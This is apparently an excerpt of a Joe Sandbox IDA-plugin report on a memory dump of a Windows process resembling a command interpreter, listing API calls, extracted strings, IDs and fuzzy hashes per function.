                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                      • API String ID: 3223794493-3086019870
                                                      • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                      • Instruction ID: ca804720800a187d85eb06eb867aab45701d57453f7ed891932efa93b519e904
                                                      • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                      • Instruction Fuzzy Hash: 0151C565E08B4296EB05EB15E402379BBA0FF49B91F948537C91E433A4DFBCE050C762
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: LocalTime$ErrorLast_get_osfhandle
                                                      • String ID: %s$/-.$:
                                                      • API String ID: 1644023181-879152773
                                                      • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                      • Instruction ID: 701e5021337040c924c7f446fcc6cad4d86dbdf22d7f0a67309c3071e22cea9d
                                                      • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                      • Instruction Fuzzy Hash: 9391A562A0864291EF15EB14E4423BEE3A0FF84B94FC44637DA4E426D4DFBCE595C322
                                                      APIs
                                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7E1DD7251), ref: 00007FF7E1DD628E
                                                      Strings
                                                      Similarity
                                                      • API ID: ObjectSingleWait
                                                      • String ID: wil
                                                      • API String ID: 24740636-1589926490
                                                      • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                      • Instruction ID: d9b4ed31722e88786d684c2bba737dde0e40d30a2e71c38c5cb31365cac5cc94
                                                      • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                      • Instruction Fuzzy Hash: EE416531A0C54283F320EB15E84237DEAA1EF85781FD48232D529C66D4DFBDE8458762
                                                      APIs
                                                      Similarity
                                                      • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                      • String ID:
                                                      • API String ID: 1397130798-0
                                                      • Opcode ID: 81bf41be8927f32f62ab646909b5bc0e1bc91de2b17cbe436688ccae12414a0f
                                                      • Instruction ID: a57081c8e1d308c905f548089beba95f808c653a5985bebefc1e5a8f2ca59585
                                                      • Opcode Fuzzy Hash: 81bf41be8927f32f62ab646909b5bc0e1bc91de2b17cbe436688ccae12414a0f
                                                      • Instruction Fuzzy Hash: C991C522B08B8296EB64EB11D4427B9F3A1FB84B94FC48036DA4E47794EF7CD540C762
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD46E
                                                        • Part of subcall function 00007FF7E1DBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7E1DBD485
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD4EE
                                                        • Part of subcall function 00007FF7E1DBD3F0: iswspace.MSVCRT ref: 00007FF7E1DBD54D
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD569
                                                        • Part of subcall function 00007FF7E1DBD3F0: wcschr.MSVCRT ref: 00007FF7E1DBD58C
                                                      • iswspace.MSVCRT ref: 00007FF7E1DC7EEE
                                                      Strings
                                                      Similarity
                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                      • String ID: A
                                                      • API String ID: 3731854180-3554254475
                                                      • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                      • Instruction ID: bd1c010b9b388b58595fccc91fe61a4f700d062647ee87abe3602ae295c908d7
                                                      • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                      • Instruction Fuzzy Hash: BFA18D6290968286E724FB21A44237DF6A0FF89791F80C536DA8D47794DFBCE451CB22
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: Enum$Openwcsrchr
                                                      • String ID: %s=%s$.$\Shell\Open\Command
                                                      • API String ID: 3402383852-1459555574
                                                      • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                      • Instruction ID: 53927a568236833ef1e237450670e4c249fac1d954a8a92c2a8f5b739748fb4a
                                                      • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                      • Instruction Fuzzy Hash: 72A1C761A0964292EF19EB55D0523B9E2A0FF85B90FC44632DA4F477C4DFBDE941C322
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: memset$wcscmp
                                                      • String ID: %s
                                                      • API String ID: 243296809-3043279178
                                                      • Opcode ID: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                      • Instruction ID: 2e5331608cf49b331b387461752fd860a29b8f58b3e68a0e05dc695ab059baf2
                                                      • Opcode Fuzzy Hash: 76e25bbe37d1b4078acb033ef5c0999176f7735716d4b3cce97783dd07bc678b
                                                      • Instruction Fuzzy Hash: 99A1C022B0978696EF35EF21D8423F9A3A0FB48758F904436DA4E4B694EF7CE644C351
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                      • String ID: %04X-%04X$:
                                                      • API String ID: 930873262-1938371929
                                                      • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                      • Instruction ID: e46f17493ce8f2359f4980bac5d54771cc69800845f5c769ce2c0579dff52851
                                                      • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                      • Instruction Fuzzy Hash: AA416421A08A4292EB24EB60E4523BAE360FB85755FC18237E58E426D5DFBCD544C762
                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                      • API String ID: 3249344982-2616576482
                                                      • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                      • Instruction ID: aa4ed4db75d2f44ac459449a037098802e5269b963e0e4e87f723f36d13b758d
                                                      • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                      • Instruction Fuzzy Hash: 9741CF72A18B8196E710DF12A841339FBA0FB89BC5F848636DA4E47794CFBCD014CB51
                                                      APIs
                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6A73
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6A91
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6AB0
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6AE3
                                                      • wcschr.MSVCRT(?,?,00000000,00007FF7E1DC68A3,?,?,?,?,?,?,?,00000000,?,00007FF7E1DC63F3), ref: 00007FF7E1DC6B01
                                                      Strings
                                                      Similarity
                                                      • API ID: wcschr$iswdigit
                                                      • String ID: +-~!$<>+-*/%()|^&=,
                                                      • API String ID: 2770779731-632268628
                                                      • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                      • Instruction ID: beadcbb0409da8bb26386bf7f19b3b267d8472ced86939c05d6d2d7f036e2e87
                                                      • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                                      • Instruction Fuzzy Hash: D0313B22A08A5685EB54EF02E491379B7E1FB49F85B85C436DA5E83364EF7CE404C362
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC1673
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC168D
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC1757
                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC176E
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC1788
                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7E1DC14D6,?,?,?,00007FF7E1DBAA22,?,?,?,00007FF7E1DB847E), ref: 00007FF7E1DC179C
                                                      Similarity
                                                      • API ID: Heap$Process$Alloc$Size
                                                      • String ID:
                                                      • API String ID: 3586862581-0
                                                      • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                      • Instruction ID: 4a002404111aaec6dd31e9545b9aa29a4e0cd3b0f55e56810cc0d3022b8664cd
                                                      • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                                      • Instruction Fuzzy Hash: 52918D61A09A56D1EF14EB15E842379B6A1FF48B80F998933CA4D033E4DFBCE451C7A1
                                                      APIs
                                                      Similarity
                                                      • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                      • String ID:
                                                      • API String ID: 1313749407-0
                                                      • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                      • Instruction ID: 3d531663272f15aa2a167deb42ed56b0d1ebfc48d506e8435f32f78f1f9ee04f
                                                      • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                      • Instruction Fuzzy Hash: 2551C622A0868292FF14FB15A406779E691FF49B90FC94636DD1E077D0EFBCE491C2A1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                      • String ID: KEYS$LIST$OFF
                                                      • API String ID: 411561164-4129271751
                                                      • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                      • Instruction ID: 15e4f702a6037c5ad8a72fc2028f27eaf1e032af54674989ea782079be31238f
                                                      • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                      • Instruction Fuzzy Hash: D9212121E08A0291F718FB25A883379E661FB85795FC0D737C61E872E5DEFCA4448662
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswdigit
                                                      • String ID: GeToken: (%x) '%s'
                                                      • API String ID: 3849470556-1994581435
                                                      • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                      • Instruction ID: ef0f9b7468addac1b581678e2efafe17ec889b006855f62f62317c29478df060
                                                      • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                      • Instruction Fuzzy Hash: A0517B31A0864295EB24EF16E446779B7A4FF44B55F848537DA4E43390DFBCE880C362
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$CurrentDirectorytowupper
                                                      • String ID:
                                                      • API String ID: 1403193329-0
                                                      • Opcode ID: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                      • Instruction ID: 0191cd607eac79fb79357e27efade4a43282e9af67022759020de1ac636cb0e9
                                                      • Opcode Fuzzy Hash: 8d3f1f6d42ab2b17ec89b1c571636d09bda29dc00517b4cae09e24a64d59b58f
                                                      • Instruction Fuzzy Hash: 4651C226A0569285EB24EF20D8027F9B7B0FF48B48F858936CA1D47394EFBCE545C361
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$_setjmp
                                                      • String ID:
                                                      • API String ID: 3883041866-0
                                                      • Opcode ID: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                      • Instruction ID: edd92022448a722bfc72fbebdf1e760168878d522278d93026a3710a40b7b14e
                                                      • Opcode Fuzzy Hash: ecc4c4b8fdff3fe7128d071ff51470f6781c2868d41e5204ec9995c2413b862b
                                                      • Instruction Fuzzy Hash: BD51A632A08BC69AEB61DF21D8413E9B7A4FB49748F804136DA4D4BB48DF7CE644C711
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                      • String ID:
                                                      • API String ID: 3114114779-0
                                                      • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                      • Instruction ID: 08ba840b93f9f81222026dcd9b03dc040855f0aa22c75cfc6daf96a6a06bd750
                                                      • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                      • Instruction Fuzzy Hash: 52416832A05B429AEB00EF75D4413ACB7A5FB88748F914036EE0E93B94DF78E406C761
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC33A8: iswspace.MSVCRT(?,?,00000000,00007FF7E1DDD6EE,?,?,?,00007FF7E1DD0632), ref: 00007FF7E1DC33C0
                                                      • iswspace.MSVCRT(?,?,?,00007FF7E1DC32A4), ref: 00007FF7E1DC331C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: iswspace
                                                      • String ID: off
                                                      • API String ID: 2389812497-733764931
                                                      • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                      • Instruction ID: 3cd32d028c9ccdaeffb85a33dfb0399a2746a29ffc38557cae928e3ff8438fc2
                                                      • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                      • Instruction Fuzzy Hash: 8A214C21F0C652A1FB64FB159552379FAA0EF85B90FD88436D90E86784DEBCE440C6A3
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                      • String ID: %s=%s$DPATH$PATH
                                                      • API String ID: 3731854180-3148396303
                                                      • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                      • Instruction ID: eea2dd9ee1255c07c1855c5781151e49d3c93d7cc779e9afd222aee6b181fda1
                                                      • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                      • Instruction Fuzzy Hash: D8219215F0965680EF59FB55E442379A360AF84B80FC89237D90E83395DFBDE440C3A2
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DC3D0C
                                                        • Part of subcall function 00007FF7E1DC3C24: towupper.MSVCRT ref: 00007FF7E1DC3D2F
                                                        • Part of subcall function 00007FF7E1DC3C24: iswalpha.MSVCRT ref: 00007FF7E1DC3D4F
                                                        • Part of subcall function 00007FF7E1DC3C24: towupper.MSVCRT ref: 00007FF7E1DC3D75
                                                        • Part of subcall function 00007FF7E1DC3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC3DBF
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925,?,?,?,?,00007FF7E1DBB9B1), ref: 00007FF7E1DB6ABF
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DB6AD3
                                                        • Part of subcall function 00007FF7E1DB6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7E1DB6AE8,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B8B
                                                        • Part of subcall function 00007FF7E1DB6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7E1DB6AE8,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B97
                                                        • Part of subcall function 00007FF7E1DB6B84: RtlFreeHeap.NTDLL ref: 00007FF7E1DB6BAF
                                                        • Part of subcall function 00007FF7E1DB6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB6AF1,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B39
                                                        • Part of subcall function 00007FF7E1DB6B30: RtlFreeHeap.NTDLL ref: 00007FF7E1DB6B4D
                                                        • Part of subcall function 00007FF7E1DB6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB6AF1,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B59
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925,?,?,?,?,00007FF7E1DBB9B1), ref: 00007FF7E1DB6B03
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DB6B17
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                      • String ID:
                                                      • API String ID: 3512109576-0
                                                      • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                      • Instruction ID: 17d18de5e14ca10350adfa32aa2996a0f90b2cd1ac54c7dd49fc07f285246e8a
                                                      • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                      • Instruction Fuzzy Hash: 8D21BF62A08A8295EF05FF2594023B8BBA0EB59B45F988033C91E83351DF7C9445C372
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB6D0
                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB6E7
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB701
                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB715
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
